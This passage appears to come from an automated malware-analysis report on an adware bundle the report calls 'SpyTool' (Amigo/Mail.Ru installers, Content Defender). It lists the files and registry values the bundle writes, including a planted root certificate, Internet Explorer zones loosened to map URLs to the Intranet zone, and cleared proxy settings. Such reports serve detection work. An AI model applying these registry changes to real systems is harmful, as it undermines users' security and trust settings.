%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\pt-PT.pak (254 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\pl.pak (253 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\tr.pak (254 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\fi.pak (242 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\xinput1_3.dll (81 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Extensions\external_extensions.json (103 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\wow_helper.exe (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\en-US.pak (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\da.pak (234 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ta.pak (3682 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\nacl64.exe (12289 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\kn.pak (3669 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\ok.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\icudtl.dat (75554 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\nb.pak (233 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\vk.exe (167 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\gu.pak (1796 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\zh-CN.pak (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\amigo_cr.exe (1615 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\lt.pak (257 bytes)
%Documents and Settings%\%current user%\Desktop\Интернет.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\et.pak (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\mm.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\chrome.7z (1266233 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\chrome_200_percent.pak (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\chrome_100_percent.pak (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\ok.exe (142 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\nacl_irt_x86_64.nexe (22433 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\cs.pak (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\hi.pak (1810 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\zh-TW.pak (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\hr.pak (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\nacl_irt_x86_32.nexe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\snapshot_blob.bin (1717 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\sw.pak (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ko.pak (263 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\nl.pak (247 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Интернет.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\VisualElements\logo.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\te.pak (1863 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\bn.pak (1830 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\de.pak (256 bytes)
%Documents and Settings%\%current user%\Desktop\Одноклассники.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\libexif.dll (310 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\chrome_watcher.dll (1636 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ru.pak (1675 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\mm.exe (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ja.pak (308 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\vi.pak (287 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\d3dcompiler_47.dll (22433 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\fr.pak (276 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\it.pak (252 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\amigo_resources.pak (28502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ca.pak (259 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\bg.pak (1705 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\libglesv2.dll (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\sr.pak (1670 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\unitywebplayer.exe (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\chrome.dll (237340 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\delegate_execute.exe (3707 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\sv.pak (235 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\es.pak (263 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\fil.pak (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ar.pak (1629 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\chrome_child.dll (307964 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\lv.pak (262 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\MailRuUpdater.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\mg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\ok.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\UnityWebPlayer.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\callback[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\wow_helper.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\vk.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\amigo.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\mm.exe (0 bytes)

The process mailruhomesearch.exe:1452 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Favorites\Mail.Ru Агент - используй для общения!.url (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\GoMailRu.ico (14076 bytes)
%Documents and Settings%\All Users\Favorites\Mail.Ru.url (152 bytes)
%Documents and Settings%\%current user%\Desktop\Искать в Интернете.url (209 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\Sputnik\MailRu.ico (14076 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\Sputnik\Report\3DD21 (744 bytes)
%System%\GroupPolicy\gpt.ini (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Mail.Ru.lnk (1 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\73EA6AEFF5F34CC59DF8ADCF7E851397.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4AF3F524D47A42E2804102EB756E9CA4.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Mail.Ru.lnk (0 bytes)

Registry activity

The process AmigoDistrib.exe:580 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C 47 49 57 A5 1A 74 60 10 6D 27 04 98 C0 2B 4E"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"RFR" = "789104"
"newrfr" = "789104"

The process 05a00036.exe:284 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 17 80 0B 84 FF 19 6D 5C F8 2D CF AF 2E 3A AC"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

The process UnityWebPlayer.exe:1816 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:

[HKCU\Software\Classes\UnityWebPlayer.UnityWebPlayer.1]
"(Default)" = "UnityWebPlayer Control"

[HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0]
"Version" = "5.0.3f2"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}]
"(Default)" = "UnityWebPlayer Control"

[HKCU\Software\Classes\UnityWebPlayer.UnityWebPlayer\CurVer]
"(Default)" = "UnityWebPlayer.UnityWebPlayer.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UnityWebPlayer]
"DisplayName" = "Unity Web Player"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\UnityWebPluginAX.ocx"

[HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0\Suffixes]
"unity3d" = ""

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}]
"AppID" = "{F008CD3D-7044-4CD4-BE14-BF3FCCF144F9}"

[HKCU\Software\Classes\AppID\{F008CD3D-7044-4CD4-BE14-BF3FCCF144F9}]
"(Default)" = "UnityWebPlayer"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\Version]
"(Default)" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UnityWebPlayer]
"DisplayVersion" = "5.0.3f2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Unity\WebPlayer]
"UnityWebPlayerDevelopment" = "no"

[HKCU\Software\Classes\UnityWebPlayer.UnityWebPlayer.1\CLSID]
"(Default)" = "{444785F1-DE89-4295-863A-D46C3A781394}"

[HKCU\Software\Classes\TypeLib\{75A564FE-95D1-41A9-B1D9-10D1E3CB502B}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\UnityWebPluginAX.ocx"

[HKCU\Software\Classes\UnityWebPlayer.UnityWebPlayer]
"(Default)" = "UnityWebPlayer Control"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\TypeLib]
"(Default)" = "{75A564FE-95D1-41a9-B1D9-10D1E3CB502B}"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\MiscStatus]
"(Default)" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0]
"Description" = "Unity Player 5.0.3f2"

[HKCU\Software\Unity\WebPlayer]
"un.Directory" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\MiscStatus\1]
"(Default)" = "131473"

[HKCU\Software\Classes\Interface\{6130BEAD-7375-4DB7-8B6D-7E41303CE675}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0]
"vendor" = "Unity Technologies ApS"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Classes\TypeLib\{75A564FE-95D1-41A9-B1D9-10D1E3CB502B}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UnityWebPlayer]
"NoRepair" = "1"
"HelpLink" = "http://unity3d.com/"

[HKCU\Software\Classes\Interface\{6130BEAD-7375-4DB7-8B6D-7E41303CE675}\TypeLib]
"(Default)" = "{75A564FE-95D1-41A9-B1D9-10D1E3CB502B}"

[HKCU\Software\Classes\Interface\{6130BEAD-7375-4DB7-8B6D-7E41303CE675}]
"(Default)" = "_DUnityWebPlayerAX"

[HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0]
"ProductName" = "Unity Web Player"

[HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0\MimeTypes\application/vnd.unity]
"Description" = "Unity Player datafile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{444785F1-DE89-4295-863A-D46C3A781394}]
"(Default)" = ""

[HKCU\Software\Classes\UnityWebPlayer.UnityWebPlayer\CLSID]
"(Default)" = "{444785F1-DE89-4295-863A-D46C3A781394}"

[HKCU\Software\Classes\Interface\{6130BEAD-7375-4DB7-8B6D-7E41303CE675}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Classes\Interface\{D10F4BFD-C3ED-44B7-BD0D-83F05E4D52D5}]
"(Default)" = "_DUnityWebPlayerAXEvents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UnityWebPlayer]
"QuietUninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\Uninstall.exe /S /CurrentUser"
"EstimatedSize" = "12288"

[HKCU\Software\Unity\WebPlayer]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer"

[HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0\MimeTypes\application/vnd.unity]
"Suffixes" = "unity3d"

[HKCU\Software\Classes\TypeLib\{75A564FE-95D1-41A9-B1D9-10D1E3CB502B}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader"

[HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0]
"Path" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\npUnity3D32.dll"

[HKCU\Software\Classes\Interface\{D10F4BFD-C3ED-44B7-BD0D-83F05E4D52D5}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Unity\WebPlayer]
"UnityWebPlayerReleaseChannel" = "Stable"

[HKCU\Software\Classes\Interface\{D10F4BFD-C3ED-44B7-BD0D-83F05E4D52D5}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 73 08 FE 63 14 BA 6F 89 1B 09 50 BA D4 2A 0F"

[HKCU\Software\Classes\Interface\{6130BEAD-7375-4DB7-8B6D-7E41303CE675}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UnityWebPlayer]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\Uninstall.exe /CurrentUser"
"NoModify" = "1"
"URLInfoAbout" = "http://unity3d.com/unitywebplayer.html"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\AppID\UnityWebPluginAX.ocx]
"AppID" = "{F008CD3D-7044-4CD4-BE14-BF3FCCF144F9}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\VersionIndependentProgID]
"(Default)" = "UnityWebPlayer.UnityWebPlayer"

[HKCU\Software\Classes\Interface\{D10F4BFD-C3ED-44B7-BD0D-83F05E4D52D5}\TypeLib]
"(Default)" = "{75A564FE-95D1-41A9-B1D9-10D1E3CB502B}"

[HKCU\Software\Classes\TypeLib\{75A564FE-95D1-41A9-B1D9-10D1E3CB502B}\1.0]
"(Default)" = "UnityWebPlayerAXLib"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UnityWebPlayer]
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\Uninstall.exe"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\ProgID]
"(Default)" = "UnityWebPlayer.UnityWebPlayer.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{444785F1-DE89-4295-863A-D46C3A781394}\iexplore\AllowedDomains\*]
"(Default)" = ""

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\ToolboxBitmap32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\UnityWebPluginAX.ocx, 102"

[HKCU\Software\Classes\Interface\{D10F4BFD-C3ED-44B7-BD0D-83F05E4D52D5}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UnityWebPlayer]
"Publisher" = "Unity Technologies ApS"

The process cd.exe:1568 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C 16 21 E8 0E C6 BE F6 A4 D5 09 E7 C3 87 22 4B"

[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0]
"(Default)" = "ContentDefenderLib"

[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\Version]
"(Default)" = "1.0"

[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\TypeLib]
"(Default)" = "{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}"

[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0\0\win32]
"(Default)" = "%Program Files%\Content Defender\cd.exe"

[HKCR\AppID\{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}]
"LocalService" = "cd"

[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Content Defender"

[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\TypeLib]
"(Default)" = "{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}"

[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\LocalServer32]
"(Default)" = "%Program Files%\Content Defender\cd.exe"

[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}]
"(Default)" = "IDefenderControl"

[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\LocalServer32]
"ServerExecutable" = "%Program Files%\Content Defender\cd.exe"

[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}]
"(Default)" = "DefenderControl Class"

The SpyTool deletes the following value(s) in system registry:

[HKCR\AppID\{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}]
"LocalService"

The process cd.exe:1264 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\ContentDefender]
"Installed" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\ContentDefender]
"ff" = "yes"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 F2 1C 69 E4 52 B6 EC 15 1D 77 25 D1 5C 28 82"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C8C18E59239C817C71A4DBC7E22110853F23711D]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 C8 C1 8E 59"

[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
